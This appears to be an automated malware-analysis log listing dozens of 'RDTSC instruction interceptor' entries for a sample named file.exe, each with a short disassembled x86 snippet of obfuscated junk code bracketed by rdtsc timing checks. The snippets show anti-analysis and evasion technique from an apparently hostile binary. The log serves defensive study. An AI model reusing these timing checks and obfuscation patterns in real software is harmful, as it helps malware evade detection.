Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CFA1F second address: 17CFA9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+12447849h], edi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F3650C99D98h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f xor dword ptr [ebp+12475279h], ebx 0x00000035 add dword ptr [ebp+122D1CDCh], edi 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov edi, dword ptr [ebp+122D2EBDh] 0x00000048 mov eax, dword ptr [ebp+122D1399h] 0x0000004e mov dword ptr [ebp+1246D17Eh], edi 0x00000054 push FFFFFFFFh 0x00000056 mov dword ptr [ebp+12476DC7h], esi 0x0000005c push eax 0x0000005d pushad 0x0000005e jmp 00007F3650C99DA9h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CFA9C second address: 17CFAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CFAA0 second address: 17CFAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D16CD second address: 17D175B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3650BE6D85h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F3650BE6D78h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov ebx, eax 0x0000002c movzx ebx, bx 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D1D4Dh], ecx 0x00000037 push 00000000h 0x00000039 call 00007F3650BE6D83h 0x0000003e add ebx, 174BCE61h 0x00000044 pop ebx 0x00000045 xchg eax, esi 0x00000046 push ecx 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a push edx 0x0000004b pop edx 0x0000004c popad 0x0000004d pop ecx 0x0000004e push eax 0x0000004f pushad 0x00000050 push esi 0x00000051 jng 00007F3650BE6D76h 0x00000057 pop esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jno 00007F3650BE6D76h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0928 second address: 17D0994 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F3650C99D9Eh 0x00000012 push edi 0x00000013 jno 00007F3650C99D96h 0x00000019 pop edi 0x0000001a nop 0x0000001b mov ebx, dword ptr [ebp+122D1E32h] 0x00000021 push dword ptr fs:[00000000h] 0x00000028 movsx edi, dx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 sub dword ptr [ebp+122D1D31h], edi 0x00000038 mov eax, dword ptr [ebp+122D12FDh] 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F3650C99D98h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 00000017h 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 movsx edi, si 0x0000005b push FFFFFFFFh 0x0000005d mov di, ax 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0994 second address: 17D099A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D3700 second address: 17D3711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D3711 second address: 17D3720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650BE6D7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D3720 second address: 17D3724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D2916 second address: 17D2920 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3650BE6D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D3724 second address: 17D37B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3650C99D9Dh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F3650C99D98h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jl 00007F3650C99D9Ch 0x0000002f mov dword ptr [ebp+1246D53Ah], ebx 0x00000035 push 00000000h 0x00000037 add di, 4FBBh 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F3650C99D98h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 00000018h 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 xor ebx, dword ptr [ebp+122D1D62h] 0x0000005e sub bl, 00000040h 0x00000061 xchg eax, esi 0x00000062 jmp 00007F3650C99DA0h 0x00000067 push eax 0x00000068 push eax 0x00000069 pushad 0x0000006a pushad 0x0000006b popad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D47B4 second address: 17D47BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D4A51 second address: 17D4A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D7208 second address: 17D720E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D720E second address: 17D7212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D905D second address: 17D90A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F3650BE6D78h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, esi 0x00000025 push 00000000h 0x00000027 mov dword ptr [ebp+122D18C0h], eax 0x0000002d add dword ptr [ebp+122D1E55h], ebx 0x00000033 push 00000000h 0x00000035 mov ebx, dword ptr [ebp+122D2B07h] 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D90A3 second address: 17D90AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D90AC second address: 17D90B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D9F31 second address: 17D9F3B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3650C99D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DBE61 second address: 17DBEDC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3650BE6D7Ah 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D2BFDh] 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D2D6Dh] 0x0000001d jmp 00007F3650BE6D85h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F3650BE6D78h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e jbe 00007F3650BE6D79h 0x00000044 movsx ebx, di 0x00000047 sub di, E7F3h 0x0000004c xchg eax, esi 0x0000004d jo 00007F3650BE6D84h 0x00000053 push eax 0x00000054 push edx 0x00000055 jng 00007F3650BE6D76h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D922C second address: 17D9230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D9230 second address: 17D9236 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D9236 second address: 17D923C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D8295 second address: 17D8299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D923C second address: 17D924F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F3650C99D98h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D8299 second address: 17D82B0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3650BE6D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jc 00007F3650BE6D80h 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DEFE4 second address: 17DEFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jo 00007F3650C99DA4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DEFF5 second address: 17DEFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E76BB second address: 17E76DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3650C99DA7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E76DC second address: 17E7707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D86h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F3650BE6D7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E7AF0 second address: 17E7AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E7AF7 second address: 17E7B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3650BE6D76h 0x0000000a jmp 00007F3650BE6D85h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E7B16 second address: 17E7B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3650C99DA3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E7B39 second address: 17E7B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007F3650BE6D7Eh 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17892E0 second address: 178930D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F3650C99D9Bh 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F3650C99D9Ah 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F3650C99D96h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 178930D second address: 1789311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1789311 second address: 1789317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EEFC4 second address: 17EEFC9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EEFC9 second address: 17EF007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jns 00007F3650C99DAEh 0x00000011 mov eax, dword ptr [eax] 0x00000013 je 00007F3650C99DB4h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3650C99D9Bh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF007 second address: 17EF02A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F3650BE6D7Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF0C1 second address: 17EF0D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF0D2 second address: 17EF0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF0D7 second address: 17EF0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF0E6 second address: 17EF0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF0EB second address: 17EF0F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF0F0 second address: 17EF113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F3650BE6D81h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF113 second address: 17EF117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF117 second address: 17EF121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EF121 second address: 17EF125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F0520 second address: 17F0526 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F6C67 second address: 17F6C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F6C6D second address: 17F6C77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3650BE6D88h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F74A4 second address: 17F74BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F74BD second address: 17F74C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F77B2 second address: 17F77C5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3650C99D96h 0x00000008 jp 00007F3650C99D96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F77C5 second address: 17F77CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C27AD second address: 161CD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, 557EF62Dh 0x0000000d mov ch, 88h 0x0000000f push dword ptr [ebp+122D0A59h] 0x00000015 call 00007F3650C99DA0h 0x0000001a mov edx, dword ptr [ebp+122D2ADFh] 0x00000020 pop edi 0x00000021 call dword ptr [ebp+122D1C85h] 0x00000027 pushad 0x00000028 cmc 0x00000029 xor eax, eax 0x0000002b jmp 00007F3650C99DA0h 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 jmp 00007F3650C99DA9h 0x00000039 pushad 0x0000003a sub dword ptr [ebp+122D213Dh], ebx 0x00000040 mov dword ptr [ebp+122D213Dh], eax 0x00000046 popad 0x00000047 mov dword ptr [ebp+122D2DD5h], eax 0x0000004d pushad 0x0000004e mov dword ptr [ebp+122D2064h], eax 0x00000054 jmp 00007F3650C99DA4h 0x00000059 popad 0x0000005a mov esi, 0000003Ch 0x0000005f jmp 00007F3650C99D9Dh 0x00000064 jmp 00007F3650C99DA3h 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d mov dword ptr [ebp+122D2064h], ecx 0x00000073 lodsw 0x00000075 or dword ptr [ebp+122D213Dh], ecx 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f mov dword ptr [ebp+122D20B4h], esi 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 mov dword ptr [ebp+122D1937h], edi 0x0000008f jne 00007F3650C99DADh 0x00000095 nop 0x00000096 push eax 0x00000097 push edx 0x00000098 js 00007F3650C99D98h 0x0000009e pushad 0x0000009f popad 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C296F second address: 17C2977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C2977 second address: 17C29A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 7BD6FE22h 0x0000000e mov dx, bx 0x00000011 call 00007F3650C99D99h 0x00000016 jmp 00007F3650C99D9Bh 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C29A2 second address: 17C29DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3650BE6D80h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F3650BE6D7Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C29DB second address: 17C29DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C2AC8 second address: 17C2ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C2ACD second address: 17C2AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C2AD3 second address: 17C2AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C2C6C second address: 17C2C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F3650C99D96h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C2C82 second address: 17C2C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C2C86 second address: 17C2CAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007F3650C99DA4h 0x00000011 js 00007F3650C99D9Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C371A second address: 17C3780 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3650BE6D7Fh 0x0000000e nop 0x0000000f xor dl, FFFFFFB5h 0x00000012 call 00007F3650BE6D86h 0x00000017 and di, 2771h 0x0000001c pop ecx 0x0000001d lea eax, dword ptr [ebp+12479059h] 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F3650BE6D78h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C3780 second address: 17C3805 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3650C99DA8h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F3650C99DB0h 0x00000012 push eax 0x00000013 jmp 00007F3650C99DA8h 0x00000018 pop eax 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F3650C99D98h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov edx, dword ptr [ebp+122D18C0h] 0x0000003a pushad 0x0000003b jl 00007F3650C99D99h 0x00000041 movsx esi, dx 0x00000044 mov ebx, 317E8EE6h 0x00000049 popad 0x0000004a lea eax, dword ptr [ebp+12479015h] 0x00000050 mov edi, dword ptr [ebp+122D306Eh] 0x00000056 nop 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
